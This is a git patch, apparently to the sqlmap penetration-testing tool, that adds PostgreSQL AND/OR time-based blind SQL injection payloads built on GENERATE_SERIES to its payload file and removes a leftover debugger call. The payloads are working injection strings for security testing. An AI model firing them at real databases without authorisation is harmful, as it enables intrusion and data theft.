From 0da1ebde7dc65058f33c66256e1ed510806d1ef4 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Tue, 7 Dec 2010 00:51:14 +0000
Subject: [PATCH] introducing PostgreSQL time based blind

---
 lib/controller/checks.py |  2 --
 xml/payloads.xml         | 50 +++++++++++++++++++++++++++++++---------
 2 files changed, 39 insertions(+), 13 deletions(-)

diff --git a/lib/controller/checks.py b/lib/controller/checks.py
index a44794b57..ff866fa36 100644
--- a/lib/controller/checks.py
+++ b/lib/controller/checks.py
@@ -361,8 +361,6 @@ def checkSqlInjection(place, parameter, value):
                                 injectable = True
                         elif check == "[DELAYED]":
                             if duration >= max(TIME_MIN_DELTA, TIME_N_RESPONSE * kb.responseTime):
-                                import pdb
-                                pdb.set_trace()
                                 infoMsg = "%s parameter '%s' is '%s' injectable " % (place, parameter, title)
                                 logger.info(infoMsg)
 
diff --git a/xml/payloads.xml b/xml/payloads.xml
index 3b478532d..dbb999a98 100644
--- a/xml/payloads.xml
+++ b/xml/payloads.xml
@@ -1463,7 +1463,7 @@ Formats:
         <title>Oracle AND time-based blind</title>
         <stype>5</stype>
         <level>1</level>
-        <risk>2</risk>
+        <risk>1</risk>
         <clause>1,2,3</clause>
         <where>1</where>
         <request>
@@ -1480,7 +1480,7 @@ Formats:
     <test>
         <title>Oracle AND time-based blind (heavy query)</title>
         <stype>5</stype>
-        <level>3</level>
+        <level>2</level>
         <risk>1</risk>
         <clause>1,2,3</clause>
         <where>1</where>
@@ -1495,6 +1495,24 @@ Formats:
         </details>
     </test>
 
+    <test>
+        <title>PostgreSQL AND time-based blind</title>
+        <stype>5</stype>
+        <level>1</level>
+        <risk>1</risk>
+        <clause>1,2,3</clause>
+        <where>1</where>
+        <request>
+            <payload>AND EXISTS(SELECT * FROM GENERATE_SERIES(1, 10000000))</payload>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>PostgreSQL</dbms>
+        </details>
+    </test>
+
     <test>
         <title>Microsoft SQL Server/Sybase AND time-based blind (heavy query)</title>
         <stype>5</stype>
@@ -1552,10 +1570,6 @@ Formats:
             <dbms_version>&gt; 2.0</dbms_version>
         </details>
     </test>
-    <!--
-         NOTE: there is no way to perform this test against Microsoft SQL
-         Server, Sybase, Oracle or PostgreSQL
-    -->
     <!-- TODO: if possible, add payload for Microsoft Access and SAP MaxDB -->
     <!-- End of AND time-based blind tests -->
 
@@ -1635,7 +1649,25 @@ Formats:
             <dbms>Oracle</dbms>
         </details>
     </test>
-    
+
+    <test>
+        <title>PostgreSQL OR time-based blind</title>
+        <stype>5</stype>
+        <level>3</level>
+        <risk>3</risk>
+        <clause>1,2,3</clause>
+        <where>2</where>
+        <request>
+            <payload>OR EXISTS(SELECT * FROM GENERATE_SERIES(1, 10000000))</payload>
+        </request>
+        <response>
+            <time>[DELAYED]</time>
+        </response>
+        <details>
+            <dbms>PostgreSQL</dbms>
+        </details>
+    </test>
+
     <test>
         <title>Microsoft SQL Server/Sybase OR time-based blind (heavy query)</title>
         <stype>5</stype>
@@ -1693,10 +1725,6 @@ Formats:
             <dbms_version>&gt; 2.0</dbms_version>
         </details>
     </test>
-    <!--
-         NOTE: there is no way to perform this test against Microsoft SQL
-         Server, Sybase, Oracle or PostgreSQL
-    -->
     <!-- TODO: if possible, add payload for Microsoft Access and SAP MaxDB -->
     <!-- End of OR time-based blind tests -->